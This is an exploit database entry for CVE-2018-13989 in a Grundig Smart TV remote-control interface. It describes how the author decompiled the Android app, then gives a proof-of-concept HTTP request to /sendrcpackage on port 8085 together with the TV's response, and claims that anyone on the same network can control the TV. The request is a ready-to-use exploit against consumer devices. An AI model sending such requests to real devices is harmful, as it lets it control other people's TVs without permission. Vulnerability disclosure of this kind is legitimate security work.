Grundig Smart [email protected] 3.0 - Cross-Site Request Forgery Vulnerability

ID 1337DAY-ID-30716
Type zdt
Reporter t4rkd3vilz
Modified 2018-07-13T00:00:00


Exploit for hardware platform in category web applications

                                            # Exploit Title: Grundig Smart [email protected] 3.0 - Cross-Site Request Forgery
# Exploit Author: Ahmethan-Gultekin - t4rkd3vilz
# Vendor Homepage:
# Software Link:
# Version: Before > Smart [email protected] 3.0
# Tested on: Kali Linux
# CVE : CVE-2018-13989
# I'm trying my TV.I saw a Grundig remote control application on
# Google Play. Computer I downloaded and decompiled APK. 
# And I began to examine individual classes. I noticed in a class
# that a request was sent during operations on the command line.
# I downloaded the phone packet viewer and opened the control application and
# made some operations. And I saw that there was such a request;
# PoC
request ->
GET /sendrcpackage?keyid=-2544&keysymbol=-4081 HTTP/1.1
Connection : Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
response ->
HTTP/1.1 200 OK
Content-Type : text/plain
# Set rc key is handled for key id : -2544 key symbol : -4081
# The only requirement for the connection between the TV and the application
# was to have the same IP address. After I made the IP address on the TV 
# and the phone and the IP address on the computer the same: 
# I accessed the interface from the 8085 port. Now I could do anything from the computer :)

# [2018-07-13]  #